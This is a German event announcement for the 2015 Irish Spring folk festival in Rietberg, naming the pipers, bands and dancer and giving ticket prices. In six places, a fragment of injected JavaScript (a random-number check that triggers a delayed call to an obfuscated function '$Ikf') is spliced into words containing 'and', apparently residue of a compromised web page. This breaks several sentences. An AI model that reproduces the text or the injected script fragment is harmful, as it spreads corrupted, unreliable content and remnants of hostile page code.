„FESTIVAL OF IRISH FOLK MUSIC“ gastiert im März in Rietberg

Seit der Premiere im Jahre 2001 hat sich Irish Spring längst vom Geheimtipp hierzulandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande zum wichtigsten keltischen Frühlings-Folk-Festival auf Tour entwickelt. Mittlerweile gastiert die Musiker-Karawane an 34 Tagen in 34 Städten, andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders war der ungebrochenen Begeisterung des Publikums für das besondere Festival nicht beizukommen. Am Donnerstag, den 05. März ist die Cultura in Rietberg ab 20 Uhr der Schauspielort.

2015 sind wieder besonders strahlende Perlen der Kunst auf dem Festival zu erleben: Zum ersten Mal wird mit Multi-Talent Lottie Cullen eine Frau dem typischen irischen Dudelsack, genannt Uilleann Pipes, auf dem Irish Spring Festival die Sporen geben. Viele halten sie für die Beste in Irlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and.

Lottie Cullen ist Teil von Perfect Friction, die auf faszinierend natürliche Weise dem Irish Folk die Pop-Krone aufsetzen. Die vier (!) Frauen, unterstützt von zwei Männern, sind schon lange kein Geheimtipp mehr. Ebenso der Akkordeonist David Munnelly aus dem County Mayo, ein grandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andioser Musiker der ersten legendären Irish Spring Tournee von 2001.

Chieftains, De Dannan oder Sharon Shannon, die Liste der Künstler mit denen er arbeitete, ist lang und beeindruckend. Munnelly ist Kopf der zur Zeit schwer angesagten Traditional Folk Gruppe Mórga, mit der er sich dem wilden instrumentalen Sound der 70er Jahre Folk-Revival Bandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ands widmet.

Die Überraschungsgäste des 2015er Jahrgangs sind Twelfth Day aus Schottlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and. Sie werden den Abend mit innovativem Athmospheric Folk eröffnen und das Publikum verführerisch sanft in den keltischen Musikkosmos geleiten. Und immer wieder wird im Laufe des Abends das Klick und Klack des Steptanzes zu sehen und zu hören sein.

Mit der Verpflichtung der Tänzerin Roísín Lyons ist dem Irish Spring Festival ein Coup gelungen: Riverdance, Lord of the Dance, Heartbeat of Home sind nur einige Shows, in denen sie als Solistin brillierte. Beim Irish Spring kann sie sich aus dem doch oft engen Korsett der Tanzshows befreien und freie Improvisationen auf höchstem Niveau präsentieren.

Weitere Informationen: www.irishspring.de

VKK : 27,50 € (Inkl. VVK-Gebühr)
AK : 30,00 €

Infos & Karten: Bürgerbüro unter 05244/986-100, www.kulturig.de und www.rietberg.de